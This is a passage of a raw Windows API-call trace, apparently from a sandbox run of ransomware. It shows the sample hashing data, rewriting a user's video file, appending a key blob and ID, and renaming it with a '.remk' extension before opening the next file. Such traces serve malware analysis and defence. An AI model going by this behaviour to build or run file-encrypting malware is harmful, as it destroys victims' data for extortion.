KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.138] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.139] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.139] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.139] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.139] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.139] GetLastError () returned 0x0 [0231.139] SetLastError (dwErrCode=0x0) [0231.139] GetLastError () returned 0x0 [0231.139] SetLastError (dwErrCode=0x0) [0231.139] GetLastError () returned 0x0 [0231.140] SetLastError (dwErrCode=0x0) [0231.140] GetLastError () returned 0x0 [0231.140] SetLastError (dwErrCode=0x0) [0231.140] GetLastError () returned 0x0 [0231.140] SetLastError (dwErrCode=0x0) [0231.140] GetLastError () returned 0x0 [0231.140] SetLastError (dwErrCode=0x0) [0231.140] GetLastError () returned 0x0 [0231.140] SetLastError (dwErrCode=0x0) [0231.140] GetLastError () returned 0x0 [0231.140] SetLastError (dwErrCode=0x0) [0231.140] GetLastError () returned 0x0 [0231.140] SetLastError (dwErrCode=0x0) [0231.140] GetLastError () returned 0x0 [0231.140] SetLastError (dwErrCode=0x0) [0231.140] GetLastError () returned 0x0 [0231.141] SetLastError (dwErrCode=0x0) [0231.141] GetLastError () returned 0x0 [0231.141] SetLastError (dwErrCode=0x0) [0231.141] GetLastError () returned 0x0 [0231.141] SetLastError (dwErrCode=0x0) [0231.141] GetLastError () returned 0x0 [0231.141] SetLastError (dwErrCode=0x0) [0231.141] GetLastError () returned 0x0 [0231.141] SetLastError (dwErrCode=0x0) [0231.141] GetLastError () returned 0x0 [0231.141] SetLastError (dwErrCode=0x0) [0231.141] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.141] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.141] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.141] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.142] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14030) returned 0x37b1b70 [0231.142] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7610 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc68 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7658 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd70 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edce0 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0231.143] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd70 | out: hHeap=0x630000) returned 1 [0231.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd70 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edce0 [0231.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edcc8 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd70 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.144] GetCurrentThreadId () returned 0x314 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6970a8 [0231.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.145] GetCurrentThreadId () returned 0x314 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd70 [0231.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edce0 [0231.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0231.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd88 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd58 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcf8 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edda0 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcf8 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edcf8 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd58 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0231.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd70 | out: hHeap=0x630000) returned 1 [0231.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edda0 | out: hHeap=0x630000) returned 1 [0231.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0231.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcf8 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd88 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7658 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.150] WriteFile (in: hFile=0x640, lpBuffer=0x37b1b70*, nNumberOfBytesToWrite=0x14027, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37b1b70*, lpNumberOfBytesWritten=0x3adfb14*=0x14027, lpOverlapped=0x0) returned 1 [0231.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.150] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1402c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.151] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0231.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0231.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0231.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.151] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0231.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.151] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.151] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.151] CloseHandle (hObject=0x640) returned 1 [0231.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b1b70 [0231.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3dd8 | out: hHeap=0x630000) returned 1 [0231.154] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AwaZ_7Drvt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\awaz_7drvt.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AwaZ_7Drvt.mkv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\awaz_7drvt.mkv.remk")) returned 1 [0231.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.160] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0231.161] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8572c0, ftCreationTime.dwHighDateTime=0x1d5db93, ftLastAccessTime.dwLowDateTime=0xfaa44010, ftLastAccessTime.dwHighDateTime=0x1d5e58f, ftLastWriteTime.dwLowDateTime=0xfaa44010, ftLastWriteTime.dwHighDateTime=0x1d5e58f, nFileSizeHigh=0x0, nFileSizeLow=0xe152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AzVzcW.mp4", cAlternateFileName="")) returned 1 [0231.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.162] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AzVzcW.mp4") returned=".mp4" [0231.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AzVzcW.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\azvzcw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.162] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=57682) returned 1 [0231.162] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.165] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe12c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.165] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.166] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.166] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, 